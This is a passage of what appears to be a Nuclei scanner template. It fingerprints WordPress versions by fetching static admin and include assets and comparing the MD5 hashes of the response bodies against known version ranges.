"(\"3fc8fe3072cf16bc8a1ea98214e2cebc\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"04f64d74b428649848955844036812f2\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"cda9416899dddadf313394ebd43cc7e1\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"6e38d42a1ea70cb8d6977d56f1540ae3\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"1a6661c026e5cc2c5d837e337cfdddb4\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6a9084969aab96f036b52d4f65ec1e92\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"6938abcd3a8afa6d7d1b93926844d9e3\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"18eaf0c9ea22cdb88360c02c21a38ccb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ee29aa2dc15802e0907872be559c742f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"84d9192954ff85e1445661888b510fdf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"65e90510014f31acfc60ce2726d0ef7d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"312a02c212d05b8bf10080e2508f5ead\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ebd741391596236221825c0a4de55904\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d58169f2b111dafc6c3b049e4ef05a48\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3efef5c8bcce187e8b46d86f8511121e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"d726c149e469fc93bd0454666f9d13cd\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"9bd9e568b7630f726ea50c1e5b37b8e0\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"4f0524bd41bf91793c2eab07e8737b24\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"58fb10cc748dd1cde88c24f07ab0e301\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"53f33ed31f23389799301fec86458c06\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"01bf077a9bb28e93c4596ee0063eab83\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"587111ae171780cc7f8dd4ab5bc31818\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"28f5840cdab148f66e3c93ca047fc6d2\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"50ecea581a41faceafa8e3af5116545a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"acb33329b9ef8aabd8bd731426803e4e\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"eddb5fda74d41dbdac018167536d8d53\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"6e79ab6d786c5c95920064add33ee599\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"55cd8e5ceca9c1763b1401164d70df50\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7424043e0838819af942d2fc530e8469\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"9754385dabfc67c8b6d49ad4acba25c3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a57c0d7464527bc07b34d675d4bf0159\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"e52dfe5056683d653536324fee39ca08\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"82ac611e3da57fa3e9973c37491486ee\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"128e75ed19d49a94a771586bf83265ec\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"56c606da29ea9b8f8d823eeab8038ee8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e6bbc53a727f3af003af272fd229b0b2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"61740709537bd19fb6e03b7e11eb8812\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a3d05665b236944c590493e20860bcdb\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"7293453cf0ff5a9a4cfe8cebd5b5a71a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"83c83d0f0a71bd57c320d93e59991c53\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"25e1e78d5b0c221e98e14c6e8c62084f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"4f04728cb4631a553c4266c14b9846aa\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a306a72ce0f250e5f67132dc6bcb2ccb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"6c4a056298234e78dfef399226863d0a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"670d07b379f5bfad08e0625eec4699bc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b7b29f888d25ff3fcc0471650d6c1ed3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3dc984331b01fcfa8d5ec942fa749f38\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"618e785cabef127b6f305551af39194e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"636d3786cc0a809009380c1b8040e9e1\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"a41175ed3524292e4d29dc11e2486308\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dca19314e2e3871f91e07bcf64b23e53\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fd425da3ec4295915254f73403f78d03\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"3edd89cf250ff41992e4aba77c41c195\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"8c7fbc1f9ffd7a9a292b6ae288f1b002\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8eb485b1fdd4cb0300cb96802908ecc7\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"17ac5e39ad81e92d93b7554a36c276d1\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0754c40a9f47a4e08e88d057cc185bfd\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"fb5beaa57223ab3cd864e925731bf76f\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"75f1c7eb78821ece2fcf5b7805854488\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"64bab9b4abfb8c4ec53c66d5d2e2df2c\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"0eb6e751aeb328f04eb683731b905ce3\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ed438902b0622173a5f39650a19c6060\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin.css" + matchers: + - type: dsl + name: 4.3 - 5.1.8 + dsl: + - "(\"bfe4bd90350018abc7c9210bfb9d2a5b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ada11abbeb8553e9524605cbfc29d26d\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"ff37a40c48d23ba4ecc09d9a98da1247\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"68600417d5dc22244168b4eeb84f0af4\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"25554fc81989c307119b7d4818dc3963\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"f0894fa9c9733d0e577fc5beddc726cd\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"25dd20710bf1eec392a00fc892b63fde\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"1906ac1bed40e0c5c7de71f2bc42dc20\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"c8c02c7d0318ddeb985e324f126a19e8\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"dc906af62607ada3fe2baac62ac3cceb\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"d8471b68d45739f07aac407c06fb8903\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"83cf78172b0d46d6a808abf644ed118f\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"a8a5bdf7cb06970dcd1de76dd2f59622\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"0beaaab72e767baed9fabade0b758090\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9083913dd3999956e49ae0be1cda8db4\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"481dbfb239988dd269ae98e46db408bd\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"96372351aa264d3fc2bb87f97c1ff35b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/editor.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"a22a4909a6b06c17cf62b1977c388e54\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cf85c9080df7d2d8c27e19e740703c0c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"6191d588e62256e25a4e735c318b5ab0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d967380a92f98ed2212fe0e433683fd1\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"515272579d154fde40423b78df09eafd\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"45d6407af8df11f4c30ca0771f6f8f1e\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"1541bad21f42a3954d3c9a599d83da7f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"dcc370abb06f10a49b52d1a8ba3ff99e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2bc7e4b19253eed1e53593a20b24d59a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"adc52d3dcd042be5ae8fee1275c9fba6\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"73fe74163067205c6d4a33d79afb49f0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f5c99de8447a3effc6ef7ca3b8b753a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/editor.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0b7a60f594a855e0e26b2f2ec9e69735\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c87633f8da294feb9c73aacfbfec6445\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"dc9f3b6295f11d544425284077dbe77f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"75cebda3459f61e6d658988be586a6cd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"51e011a46e2657f9aa80056e9839d5d1\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"05019309afe8ba2eaef54135e1b28f3a\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"ab5e2269551288bd648c259ce2d3e1be\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"60bfecc5cd647b68e7e6031fa539422c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c6bb12fac52da543dc8bb9b23952c4b9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"639720f115ef90063f1322115a1d5cd5\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"175c53174f9113c448f919cbccae40d3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cb1ca79169dcde958fb4e44d8d04a5fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-library.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"291bd8b45040401f3a8897c828406b9a\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"74357886d827e1f853efdd226b79f78d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.4 + dsl: + - "(\"f8dd79f25b1b88b0dac790416138a00a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"f8852dc27fc72a22978f69c48fc9eda0\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d89c10f1291f8a91b7fc792102e9a50f\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"5797071c93968c42fa3e3273f845dde1\" == md5(body))" + - type: dsl + name: 5.0.6 - 5.0.11 + dsl: + - "(\"0ae164e7a41074a26c6cb3269dc315bb\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"630d0a20ef044b004db95a590b16e539\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5786c85790791cef4476254b70a3e310\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"77f4bee1b57b7a2e8c7a3a00472fbd93\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"76a8f66f1baf61530ba29a6e63646d14\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"427db941f1aabc7a9e5ea0e422ecbe61\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"18a4cc9108b119dae32fa49b1cf721d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"072ef14ff62aedc7478e43e8da64965d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-library.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"1d2c405b92e99c5e00853b228f850320\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c56e6de4eae3228b22d00c3724679a89\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.4 + dsl: + - "(\"3d87ea3fd4d155e3f8d0e1e96cea6256\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"4521e9e5c60e1b4423ba6fbb131ddc5c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"98bde7733f06287852aecf081701fd15\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"94a6cbc830b4626b54a58c3834aa3fd3\" == md5(body))" + - type: dsl + name: 5.0.6 - 5.0.11 + dsl: + - "(\"a0c292f486ed240d8dd94b46926dc09a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f02452393cdd7a8b29709778a74ca06e\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"27a78ec28594f9c11c1a5b2a58783ce0\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"4c4aa2ca24ecf50d440b387de1abd66a\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"83e96c1857cf0f48a0977c3f1945ec58\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"4d608fe3d1e2749c4cdb25ab202454ec\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"41822c26ae5c3152c62d680acb4348d6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c5df24c1fff24d23a6e67dbc28c116de\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"14eac74ea4d8aeca08e8ef8d54d42600\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"d30ad028653d4eac285a1d4d06567bbd\" == md5(body))" + - type: dsl + name: 2.7 - 3.7.35 + dsl: + - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"01183853cffabcfc771e87e405727059\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"52a6c4d3a6cefff47b79c30db7d8ee7a\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"34b2e8e0aa667614a0d5f5a51c495523\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bde01a471cbd94556bde642fb5d9a47e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f64b977554cb703fea652f071f860569\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"b83efaf9c4e6691f4cede5576faea864\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"fec112ee4ed2c2b98379542caf62fdf8\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"7db11622caac3bac91fc306b3a31387d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0cc71f461782b4934436aeffecc878ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/components.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"7c27168f0230a5cb5a821dea4546ca81\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"e62b5f92035e2e50e0586f759514591c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"84cdfb957f060ba494e4a5178672c106\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6ffc4c427d77a88a1b5cfac3d17cbf47\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"11fe173edfba0532a0a8cf7bd5a205f5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"663eaffbf181f29735fceeb3c3f97689\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b4f0eb3ad608b4c8e8ee6ba6015bb09a\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c10f5b9306bb3404b640af730e312d35\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"bd3a91716306fed014aee273763ad179\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"8bd21b96c00552743be00093a557eb02\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3b895f6f07a0d2086b5dbbe22ffb0f62\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/components.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"08c30574c8edf2379c68a601d8b7ee8a\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"0de0e022a32a1fc83bcab47595434875\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"51965929307297ed0ef5e9ad07709dfa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2f62353fb94912550c115db169918e40\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3b8ab0e0e89de6e23fa254fcc917bedf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b6a7f7c36df118e1fa6c53674607fe5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"edaf8c970a6a15ca0926cb1eba5cca85\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"7a47b05a3d8952e1366b305a9964ceb5\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"77ea71e2d098778a39ce22cd1d46b850\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"15209b1d60d6b5dc64918d87fd039355\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"41aecf7743c41d3a638a22f06c53a2f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"0d0078b5771e9db91b0223bd9d596175\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0bcf1bfb6aadae7de803ddeb3c060658\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3985f920257f3d239695bc9278fa799b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8177cd68c95cec36f7b3e10fdeee8336\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c527698d617b7d12502c10fa3c15dc19\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"9e4c5d344df641c3ccad1cfcf841f941\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"df8d0fcab2428792fe751d8983e9f7d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"21aa4baf49dde8193561db25b2209c71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"75fefe34b7f48fae5e586a1a47ae90bf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c11c93210abdee789e409376cd0a5c5c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"943022038ee60fe653ad3661fe5e45f9\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"61ab069aacd4d601a6a2fde14df4e70f\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"480bcf3053b663abbfdafa48493f6374\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"e1210805da48ace34900897bdc5f26bf\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"cad17c21d91b7f11da688d1e9dce20c5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a85b002b4c0c1e9194944e072a857464\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"58f65a696e381a7e74ed02b7c7eb2f88\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9fe3e6ba7eb849f83f99d4c157a9351f\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"7475bf3300b9b09cfdad9491bca3f215\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"097f71ecb19edf4fe945a8afee00c908\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d8d916dc8eb7de2d93753d2f21482101\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"38772ec68546889e62f4cf28fdcbbde9\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6f495e61e507d0ed5a7a9de7019b0f4a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"60b46fe4c022f4124ba8a0507a4abdeb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c95fbbd85d14b7f107c9363983ba78ff\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6e89b5fd71d2d1b815c8bd80353b2dce\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"39461240391db9948d3e7d1ad1abfef4\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"73c479e8517d6f74175bc745fdbb6d35\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1488f88d9014008bd0dbb170815afe57\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"bee313b104940f32a4a4b7dea5a7b780\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"e604b03d546da590669bbfe20a0e7bbf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"f3c72ab81488215a91b0550d202a08ed\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"98bb07383e45aa479177ad8b6e7f49e4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"083dbc70593847f2e1bf728a58ddd059\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3d11cdb0e238d76fa865ae1d6929b93c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"15e61d98724841bd7262998182f3a999\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"340e21ee8bdc8d949bf8f3e619261f3d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"96d79cf85e8e536a52ea3b2b85f5d688\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"baa7a7a40db081f84136804a07a2e264\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"62acfa3c0527d48e1f6b05a1e184b342\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"85d54bb343a31b620a1af2d429fc5436\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"fda0e5ce02c5900dd041baab092d4f3a\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"77529e7ab55b635462f5dbe80593b7eb\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"e954ddd78c021db65a745bcf468e71bf\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"8cf004a8a36761cc57ccb97afe9b9b30\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8091a06d5574edd3c5259643b8af24b3\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"ba0acdd2da464f6c25a8320816f945d9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"75010bb43088888d3cd66ce3d5093016\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3d65a0d03b8cf1dccfd86dbb7c4fd1ae\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"34aaa2e3bb0ea2c12c57fb7ab40a3b70\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"74dfbb7f9247575cd6ac455071b2deaf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d7285996efa524866a6eaaf06cca524b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f857f13215f9d88f49ecc95ac94b338\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ed28009277c6fcc98f9d976aa6eba432\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"151dfe98fe81cf303ddd51228ac6f3d0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"6165fb1bb259adcc78c89832a84aff4d\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"2cb2a8dd236d1e4a362e1b4ca3f2b84b\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"16ae3878586942fdae57e349dcda572e\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"fd23950196d3732d26a864dbcd4bcb83\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ddf24cdfc94b91a28c950825c40c48a\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"7d9026521ee5ae1955003f6bf2693417\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d7a985e8ee7af92319d09bef2a66974b\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f6b3073e60d1315a6594a871465fc199\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"264b0baf2bceaadaf426043b5c4b57bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 